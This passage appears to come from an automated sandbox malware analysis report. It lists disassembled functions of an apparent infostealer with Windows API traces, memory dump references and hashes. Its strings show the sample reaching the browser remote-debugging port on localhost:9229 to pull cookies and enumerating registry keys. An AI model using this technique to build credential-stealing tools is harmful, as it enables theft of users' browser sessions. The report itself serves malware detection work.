                          • lstrlen.KERNEL32(00434FA0), ref: 004218D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004218F4
                          • lstrcat.KERNEL32(00000000,00434FA0), ref: 00421900
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0042192F
                          • lstrlen.KERNEL32(00FA6068), ref: 00421945
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0042196C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00421977
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004219A6
                          • lstrlen.KERNEL32(00434FA0), ref: 004219B8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004219D9
                          • lstrcat.KERNEL32(00000000,00434FA0), ref: 004219E5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A14
                          • lstrlen.KERNEL32(00FA6078), ref: 00421A2A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A51
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00421A5C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A8B
                          • lstrlen.KERNEL32(00FA60C8), ref: 00421AA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AC8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00421AD3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen
                          • String ID:
                          • API String ID: 1049500425-0
                          • Opcode ID: f21290ba87296aa301baa481ae5ffd6d7236596dfacd505c939c513b74ab4786
                          • Instruction ID: 4e92f33e8d426ec36ead6e448680228ec6ca987c2ec4c4eb07e82ab5e04cfdfb
                          • Opcode Fuzzy Hash: f21290ba87296aa301baa481ae5ffd6d7236596dfacd505c939c513b74ab4786
                          • Instruction Fuzzy Hash: C4912FB07017039FD720AFB9ED88A17B7E9AF14344B54542EA886D33A1DB78E845CB64
                          Function 00414760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00414793
                          • LocalAlloc.KERNEL32(00000040,?), ref: 004147C5
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00414812
                          • lstrlen.KERNEL32(00434B60), ref: 0041481D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041483A
                          • lstrcat.KERNEL32(00000000,00434B60), ref: 00414846
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041486B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414898
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004148A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004148CA
                          • StrStrA.SHLWAPI(?,00000000), ref: 004148DC
                          • lstrlen.KERNEL32(?), ref: 004148F0
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00414931
                          • lstrcpy.KERNEL32(00000000,?), ref: 004149B8
                          • lstrcpy.KERNEL32(00000000,?), ref: 004149E1
                          • lstrcpy.KERNEL32(00000000,?), ref: 00414A0A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00414A30
                          • lstrcpy.KERNEL32(00000000,?), ref: 00414A5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 4107348322-3310892237
                          • Opcode ID: 4b80f5c9a1b5ec993686d8133918b71c1ec12d64141c7639b02f1772728f6fd7
                          • Instruction ID: f336fa1c6ca706a05192d306034da658a1ba66cc2b10bf069ab586907ca8125d
                          • Opcode Fuzzy Hash: 4b80f5c9a1b5ec993686d8133918b71c1ec12d64141c7639b02f1772728f6fd7
                          • Instruction Fuzzy Hash: 01B19071B102069BCB21EF79D989A9F77B5AF84304F05403AF846A7391DB78EC458B98
                          Function 004092B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004090C0: InternetOpenA.WININET(0042CFEC,00000001,00000000,00000000,00000000), ref: 004090DF
                            • Part of subcall function 004090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004090FC
                            • Part of subcall function 004090C0: InternetCloseHandle.WININET(00000000), ref: 00409109
                          • strlen.MSVCRT ref: 004092E1
                          • strlen.MSVCRT ref: 004092FA
                            • Part of subcall function 00408980: std::_Xinvalid_argument.LIBCPMT ref: 00408996
                          • strlen.MSVCRT ref: 00409399
                          • strlen.MSVCRT ref: 004093E6
                          • lstrcat.KERNEL32(?,cookies), ref: 00409547
                          • lstrcat.KERNEL32(?,00431794), ref: 00409559
                          • lstrcat.KERNEL32(?,?), ref: 0040956A
                          • lstrcat.KERNEL32(?,00434B98), ref: 0040957C
                          • lstrcat.KERNEL32(?,?), ref: 0040958D
                          • lstrcat.KERNEL32(?,.txt), ref: 0040959F
                          • lstrlen.KERNEL32(?), ref: 004095B6
                          • lstrlen.KERNEL32(?), ref: 004095DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 00409614
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 1201316467-3542011879
                          • Opcode ID: df8e57aa61c5f2e305b9d3a67dc0815ad7811aea324e54aafe6f9d5a69f4586c
                          • Instruction ID: 05c5ff6c67f5a585ffa253fed58a7d424d5cd25d1d50a03bb6902015a51b916b
                          • Opcode Fuzzy Hash: df8e57aa61c5f2e305b9d3a67dc0815ad7811aea324e54aafe6f9d5a69f4586c
                          • Instruction Fuzzy Hash: 66E12871E00218DBDF14DFA9D984ADEBBB5AF48304F10446AE509B7281DB78AE45CF94
                          Function 0041D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0041D9A1
                          • memset.MSVCRT ref: 0041D9B3
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041D9DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041DA0E
                          • lstrcat.KERNEL32(?,00000000), ref: 0041DA1C
                          • lstrcat.KERNEL32(?,00FBE020), ref: 0041DA36
                          • lstrcat.KERNEL32(?,?), ref: 0041DA4A
                          • lstrcat.KERNEL32(?,00FBCF80), ref: 0041DA5E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041DA8E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0041DA95
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041DAFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2367105040-0
                          • Opcode ID: 30b76ee9403a79d3d69e95f151e3111db70670f2e28169058c7bccd52e540d17
                          • Instruction ID: 32da4153a2b2d79e9748dd64895ee3eb06670ecd90bce52be79c4ef31840ac81
                          • Opcode Fuzzy Hash: 30b76ee9403a79d3d69e95f151e3111db70670f2e28169058c7bccd52e540d17
                          • Instruction Fuzzy Hash: 8AB1A2B1E102199FCB10EF64DC889EF77B9AF48304F04496AF506A7290DB789E45CFA4
                          Function 0040B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040B330
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B37E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B3A9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040B3B1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B3D9
                          • lstrlen.KERNEL32(00434C50), ref: 0040B450
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B474
                          • lstrcat.KERNEL32(00000000,00434C50), ref: 0040B480
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B4A9
                          • lstrlen.KERNEL32(00000000), ref: 0040B52D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B557
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040B55F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B587
                          • lstrlen.KERNEL32(00434AD4), ref: 0040B5FE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B622
                          • lstrcat.KERNEL32(00000000,00434AD4), ref: 0040B62E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B65E
                          • lstrlen.KERNEL32(?), ref: 0040B767
                          • lstrlen.KERNEL32(?), ref: 0040B776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040B79E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: cfb3897a5a22d652b1bb1a04214257f6ca3ef3a37118c0db83653040ed551a65
                          • Instruction ID: 4afffce4605d1a75ec51afec93a77234444edbd91dbe087508a9a4c28d7718fa
                          • Opcode Fuzzy Hash: cfb3897a5a22d652b1bb1a04214257f6ca3ef3a37118c0db83653040ed551a65
                          • Instruction Fuzzy Hash: FA021D70A012058FCB25DF69D989A6AB7A1EF44308F18847EE405AB3E1D779DC42CFD8
                          Function 00423760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004271FE
                          • RegOpenKeyExA.ADVAPI32(?,00FBAFF0,00000000,00020019,?), ref: 004237BD
                          • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004237F7
                          • wsprintfA.USER32 ref: 00423822
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00423840
                          • RegCloseKey.ADVAPI32(?), ref: 0042384E
                          • RegCloseKey.ADVAPI32(?), ref: 00423858
                          • RegQueryValueExA.ADVAPI32(?,00FBDDE0,00000000,000F003F,?,?), ref: 004238A1
                          • lstrlen.KERNEL32(?), ref: 004238B6
                          • RegQueryValueExA.ADVAPI32(?,00FBDD98,00000000,000F003F,?,00000400), ref: 00423927
                          • RegCloseKey.ADVAPI32(?), ref: 00423972
                          • RegCloseKey.ADVAPI32(?), ref: 00423989
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 13140697-3278919252
                          • Opcode ID: 4e9d1cae0e3a2af3057db68a159ca54c7e46fe24ae7588bd7d44b17841373044
                          • Instruction ID: cea90c054b18a974ae4fcbf3100dacfdb3a6551e752be9f2135fa6a3919537d3
                          • Opcode Fuzzy Hash: 4e9d1cae0e3a2af3057db68a159ca54c7e46fe24ae7588bd7d44b17841373044
                          • Instruction Fuzzy Hash: 2391BEB2A002189FCB10DF94ED809DEB7B9FB48310F14816EE509B7251DB79AE41CFA4
                          Function 004090C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenA.WININET(0042CFEC,00000001,00000000,00000000,00000000), ref: 004090DF
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004090FC
                          • InternetCloseHandle.WININET(00000000), ref: 00409109
                          • InternetReadFile.WININET(?,?,?,00000000), ref: 00409166
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409197
                          • InternetCloseHandle.WININET(00000000), ref: 004091A2
                          • InternetCloseHandle.WININET(00000000), ref: 004091A9
                          • strlen.MSVCRT ref: 004091BA
                          • strlen.MSVCRT ref: 004091ED
                          • strlen.MSVCRT ref: 0040922E
                          • strlen.MSVCRT ref: 0040924C
                            • Part of subcall function 00408980: std::_Xinvalid_argument.LIBCPMT ref: 00408996
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 1530259920-2144369209
                          • Opcode ID: 0705428bbcfa598ed41d0b8a19cc95d4e080841770a1eefc8c5b6b07f42995b4
                          • Instruction ID: 37aafcde9dc8677222a14fe08098824145c1bcf6f4b2fcbe97b14dd3a3e353a1
                          • Opcode Fuzzy Hash: 0705428bbcfa598ed41d0b8a19cc95d4e080841770a1eefc8c5b6b07f42995b4
                          • Instruction Fuzzy Hash: F251C471700205ABE710DBA8DC45BDEF7FADB48710F14016AF904E72C1DBB8AA4487A9
                          Function 00421660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 004216A1
                          • lstrcpy.KERNEL32(00000000,00FAAEB0), ref: 004216CC
                          • lstrlen.KERNEL32(?), ref: 004216D9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004216F6
                          • lstrcat.KERNEL32(00000000,?), ref: 00421704
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0042172A
                          • lstrlen.KERNEL32(00FBA0A8), ref: 0042173F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00421762
                          • lstrcat.KERNEL32(00000000,00FBA0A8), ref: 0042176A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00421792
                          • ShellExecuteEx.SHELL32(?), ref: 004217CD
                          • ExitProcess.KERNEL32 ref: 00421803
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                          • String ID: <
                          • API String ID: 3579039295-4251816714
                          • Opcode ID: d8a4b448b3cbd2fec1d6e41789f4e9dc9c9ba109b5cf32146fe5b58423eccd26
                          • Instruction ID: f659c962d449d528c0de98020f3ba008cf9020a16bed5b03d1e21acbc4105001
